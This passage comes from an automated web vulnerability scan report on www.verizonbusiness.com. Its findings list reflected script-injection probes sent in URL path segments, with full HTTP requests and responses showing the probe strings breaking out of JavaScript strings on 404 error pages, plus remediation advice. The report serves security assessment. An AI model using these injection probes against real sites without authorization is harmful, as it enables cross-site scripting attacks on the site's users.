Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/expressInstall.swf370c9";01455493364";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1088. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/expressInstall.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81c5'%3bc0f85279f16 was submitted in the REST URL parameter 2. This input was echoed as d81c5';c0f85279f16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/expressInstall.swfd81c5'%3bc0f85279f16 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:57 GMT
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templates/expressInstall.swfd81c5';c0f85279f16'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1089. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/hbx.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84e0"%3b40bfd7b64bf was submitted in the REST URL parameter 1. This input was echoed as c84e0";40bfd7b64bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesc84e0"%3b40bfd7b64bf/hbx.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:14 GMT
Vary: *
Content-Type: text/html
Content-Length: 40612
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templatesc84e0";40bfd7b64bf/hbx.js";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTIO
...[SNIP]...

1.1090. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/hbx.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19d19'%3bf7195436b29 was submitted in the REST URL parameter 1. This input was echoed as 19d19';f7195436b29 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates19d19'%3bf7195436b29/hbx.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:26 GMT
Vary: *
Content-Type: text/html
Content-Length: 40614
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/templates19d19';f7195436b29/hbx.js'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1091. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/hbx.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9a62'%3be6f32187f2c was submitted in the REST URL parameter 2. This input was echoed as d9a62';e6f32187f2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/hbx.jsd9a62'%3be6f32187f2c HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:50 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40612
Date: Wed, 17 Nov 2010 00:03:50 GMT
Connection: close
Vary: Accept-Encoding
Expires: Mon, 16 Nov 2009 18:03:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templates/hbx.jsd9a62';e6f32187f2c'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1092. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/hbx.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4223c"%3b08738572e10 was submitted in the REST URL parameter 2. This input was echoed as 4223c";08738572e10 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/hbx.js4223c"%3b08738572e10 HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:36 GMT
Vary: *
Content-Type: text/html
Content-Length: 40612
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/hbx.js4223c";08738572e10";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1093. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fbee"%3b959eabdf70 was submitted in the REST URL parameter 1. This input was echoed as 2fbee";959eabdf70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates2fbee"%3b959eabdf70/js-+jquery/jquery+swfobject2+vzbar/site.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:19 GMT
Vary: *
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates2fbee";959eabdf70/js-+jquery/jquery+swfobject2+vzbar/site.js";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATIO
...[SNIP]...

1.1094. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d787f'%3bb866420fac6 was submitted in the REST URL parameter 1. This input was echoed as d787f';b866420fac6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesd787f'%3bb866420fac6/js-+jquery/jquery+swfobject2+vzbar/site.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:29 GMT
Content-Type: text/html
Content-Length: 40684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templatesd787f';b866420fac6/js-+jquery/jquery+swfobject2+vzbar/site.js'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1095. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8515'%3b1e90016a7f0 was submitted in the REST URL parameter 2. This input was echoed as b8515';1e90016a7f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/b8515'%3b1e90016a7f0/jquery+swfobject2+vzbar/site.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:00 GMT
Vary: *
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/templates/b8515';1e90016a7f0/jquery+swfobject2+vzbar/site.js'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1096. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52818"%3b7b3f28e7de6 was submitted in the REST URL parameter 2. This input was echoed as 52818";7b3f28e7de6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/52818"%3b7b3f28e7de6/jquery+swfobject2+vzbar/site.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:46 GMT
Vary: *
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/52818";7b3f28e7de6/jquery+swfobject2+vzbar/site.js";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.1097. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7787"%3bd002e688b25 was submitted in the REST URL parameter 4. This input was echoed as b7787";d002e688b25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/js-+jquery/jquery+swfobject2+vzbar/b7787"%3bd002e688b25 HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:17 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40670
Date: Wed, 17 Nov 2010 00:04:17 GMT
Connection: close
Vary: Accept-Encoding
Expires: Mon, 16 Nov 2009 18:04:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/js-+jquery/jquery+swfobject2+vzbar/b7787";d002e688b25";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1098. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea925'%3b0a48eefe9de was submitted in the REST URL parameter 4. This input was echoed as ea925';0a48eefe9de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/js-+jquery/jquery+swfobject2+vzbar/ea925'%3b0a48eefe9de HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:46 GMT
Vary: *
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/templates/js-+jquery/jquery+swfobject2+vzbar/ea925';0a48eefe9de'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1099. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab7ea'%3bd291df70e87 was submitted in the REST URL parameter 1. This input was echoed as ab7ea';d291df70e87 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesab7ea'%3bd291df70e87/vzbar/bert.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:09 GMT
Content-Type: text/html
Content-Length: 40630
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templatesab7ea';d291df70e87/vzbar/bert.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1100. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5aeb"%3b65e1fbc3483 was submitted in the REST URL parameter 1. This input was echoed as f5aeb";65e1fbc3483 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesf5aeb"%3b65e1fbc3483/vzbar/bert.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
